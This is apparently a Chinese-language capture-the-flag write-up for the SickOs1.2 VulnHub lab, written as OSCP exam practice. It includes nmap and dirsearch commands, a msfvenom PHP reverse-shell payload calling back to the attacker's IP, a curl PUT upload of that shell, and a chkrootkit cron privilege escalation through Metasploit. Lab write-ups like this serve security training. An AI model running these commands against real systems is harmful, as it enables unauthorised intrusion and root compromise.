当前位置: 首页 > news >正文

OSCP备战-SickOs1.2靶场详细步骤

一、靶机介绍

靶机基本信息:

靶机下载链接https://www.vulnhub.com/entry/sickos-12,144/
作者D4rk
发布日期2016年4月27日
难度中等

二、信息搜集

记得将网络连接改成nat模式
1、    目标IP探测
 
目标IP:192.168.155.186
2、    端口扫描

nmap -p- --min-rate 1000 -T4 192.168.155.186


 

   nmap -p22,80 -sV -sC -A  --min-rate 1000 -T4 192.168.155.186


 
三、GETshell


信息不多一个ssh,一个站点。先去站点看看情况
给出一张图片:病毒真的是杀毒公司为了钱而制作的吗
 
查看源码没有什么东西,目录扫描一遍
dirsearch -u http://192.168.155.186
 

好像没有什么有用信息
 
可以确定入口了,查询一下:

searchsploit lighttp


 
但是没有看到1.4.28版本对应漏洞
查询一下网址请求方法:

curl http://192.168.155.186/test/ -vv -X OPTIONS



看到有PUT方法,结合之前的访问目录,猜测文件上传访问反弹shell
制作php脚本

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.155.166 LPORT=443 >shell4431.php



上传:

curl -v -H "Expect:" -T shell4431.php "http://192.168.155.186/test/"



打开msf:

use exploit/multi/handler
show options
set lhost IP
set lport 443
run


 
成功
 

四、提权


内核提权,查看发行版本:

cat /etc/os-release



 
有脚本但是不行
 
列出与系统定时目录相关的文件和配置

ls -la /etc/cron*



找到一个 chkrootkit
有漏洞利用,一个说明文档一个msf脚本
 
将会话放置后台
 


进入特定会话
 

 set seesion 1


成功
 
完成
 

http://www.xdnf.cn/news/715861.html

相关文章:

  • 第九章 MQTT报文
  • C primer plus (第六版)第六章 编程练习第10题
  • 关于《DAHSF》即《火小兔智慧开发平台V2.0》的碎碎念
  • ADC同步采样
  • XMOS以全新智能音频及边缘AI技术亮相广州国际专业灯光音响展
  • 【NebulaGraph】查询案例(七)
  • 两个频率比较接近的简谐振动叠加后会产生拍形
  • C#学习:基于LLM的简历评估程序
  • 4. 算法与分析 (1)
  • 【Dify系列教程重置精品版】第十一章:Dify与slenium
  • Flutter下的一点实践
  • 手动移植FreeRTOS
  • 用 Python 模拟雪花飘落效果
  • Oracle 临时表空间详解
  • Oracle的NVL函数
  • 前端面试题-HTML篇
  • C++:栈帧、命名空间、引用
  • 第三章:地下三层的技术遗产
  • JaCoCo 是什么
  • 系统架构设计师案例分析----经典架构风格特点
  • 挡片/测试晶圆(Dummy Wafer)通俗解析
  • 非线性声学计算与强化学习融合框架:突破复杂环境人机交互的新技术
  • C++进阶--C++11(04)
  • Golang 配置国内代理
  • Android高级开发第二篇 - JNI 参数传递与 Java → C → Java 双向调用
  • 【第4章 图像与视频】4.5 操作图像的像素
  • FastAPI JWT和hash加密
  • 数据中台系统是什么意思?如何实现数据中台的搭建?
  • MySQL JSON数据存储结构与操作
  • 几款主流V30、V60、V90相机SD卡的评测(索尼、闪迪、三星、雷克沙)